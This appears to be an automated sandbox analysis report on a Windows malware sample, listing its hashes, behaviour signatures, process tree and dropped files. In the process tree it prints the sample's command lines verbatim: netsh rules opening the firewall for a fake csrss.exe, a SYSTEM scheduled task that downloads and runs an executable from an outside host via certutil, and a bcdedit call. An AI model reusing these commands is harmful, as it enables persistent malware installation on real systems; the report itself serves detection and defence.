Analysis
-
max time kernel
90s -
max time network
209s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 02:30
Static task
static1
Behavioral task
behavioral1
Sample
d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
Resource
win10v2004-20220414-en
General
-
Target
d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
-
Size
3.9MB
-
MD5
de7029a8adb05fd10cafd0ef1df1fb90
-
SHA1
32d1100326f06828b50b9f58b42a3dbc5adad91b
-
SHA256
d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90
-
SHA512
5866ab74a59c60495d9b72ac9e121a7353729f7ed86842c741b457fe8a86280f05a174e32a12999da823a1535a2101a537aec96bf64bfbba078d407a8e1d8ce7
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 4664 created 2392 4664 svchost.exe d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1644 bcdedit.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4220 5000 WerFault.exe d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2368 schtasks.exe 2512 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exed062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exepid process 2392 d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe 2392 d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe 5000 d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe 5000 d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exesvchost.exedescription pid process Token: SeDebugPrivilege 2392 d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe Token: SeImpersonatePrivilege 2392 d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe Token: SeTcbPrivilege 4664 svchost.exe Token: SeTcbPrivilege 4664 svchost.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
svchost.exed062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.execmd.exedescription pid process target process PID 4664 wrote to memory of 5000 4664 svchost.exe d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe PID 4664 wrote to memory of 5000 4664 svchost.exe d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe PID 4664 wrote to memory of 5000 4664 svchost.exe d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe PID 5000 wrote to memory of 428 5000 d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe cmd.exe PID 5000 wrote to memory of 428 5000 d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe cmd.exe PID 428 wrote to memory of 3928 428 cmd.exe netsh.exe PID 428 wrote to memory of 3928 428 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe"C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe"C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes4⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotbooks.tech/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 8523⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5000 -ip 50001⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
923KB
MD5f7026d342ec3138975baae46055dd2ee
SHA156d955b60a69cb44a35f28507211dc01777e2f7a
SHA256185dd733af2e462e2b735eb0ee8111138674f663c752e6fc3a42a7e80008d0e8
SHA5124bddfb0cb532cd3fb198906440d7eee8aa3a2bc1950afe83a3a5fe567595352581ae43b0245fc969da9e2e75d6e67b371c0a24ff29db24447f5426b6a4dd839f
-
C:\Windows\rss\csrss.exeFilesize
2.0MB
MD52b9d10dca8a3cd7a4dcd49830aa2f0c5
SHA129d231058f7772f9426b9b3c5b8ede9b411fdfdd
SHA2569c8bbbcd60897cc8fe6d1c5cd364fdadd99a546a797792e4c52d7d77f95379bb
SHA512fcefd0ca13688e78044a3a0ff01ecb4ad388a4c21e4bbfed2cb6f22544bc8cc851bc0634105b4e8e86b9cbb47bd583835e3c7bc0ee23f69b3e740ce6c0541809
-
C:\Windows\rss\csrss.exeFilesize
1.9MB
MD549f3d134111bbcfd655a0b8751bdd266
SHA1d7b39a56602033572399a93308fbfe79273736ef
SHA256c484d5519a94ddb9b8c8e2227e63ab96b11c681e2e74f3b093c04f945379a4ee
SHA512b28f666d5e9481fb38dbe7331787b03d399ac1de4d25aac5067fe0b7b4839f32d25dd2653420ada082caf8af6b87cac749012442e6e48d480704521d52bf8a71
-
memory/320-139-0x0000000000000000-mapping.dmp
-
memory/428-134-0x0000000000000000-mapping.dmp
-
memory/1644-150-0x0000000000000000-mapping.dmp
-
memory/2368-147-0x0000000000000000-mapping.dmp
-
memory/2392-130-0x0000000004F93000-0x000000000533A000-memory.dmpFilesize
3.7MB
-
memory/2392-132-0x0000000000400000-0x0000000002FC6000-memory.dmpFilesize
43.8MB
-
memory/2392-131-0x0000000005340000-0x0000000005A36000-memory.dmpFilesize
7.0MB
-
memory/2512-146-0x0000000000000000-mapping.dmp
-
memory/2520-140-0x0000000000000000-mapping.dmp
-
memory/2908-148-0x0000000000000000-mapping.dmp
-
memory/3928-135-0x0000000000000000-mapping.dmp
-
memory/3952-145-0x0000000000400000-0x0000000002FC6000-memory.dmpFilesize
43.8MB
-
memory/3952-144-0x0000000005100000-0x00000000054A7000-memory.dmpFilesize
3.7MB
-
memory/3952-141-0x0000000000000000-mapping.dmp
-
memory/5000-138-0x0000000000400000-0x0000000002FC6000-memory.dmpFilesize
43.8MB
-
memory/5000-137-0x0000000005070000-0x0000000005766000-memory.dmpFilesize
7.0MB
-
memory/5000-136-0x0000000004CC0000-0x0000000005067000-memory.dmpFilesize
3.7MB
-
memory/5000-133-0x0000000000000000-mapping.dmp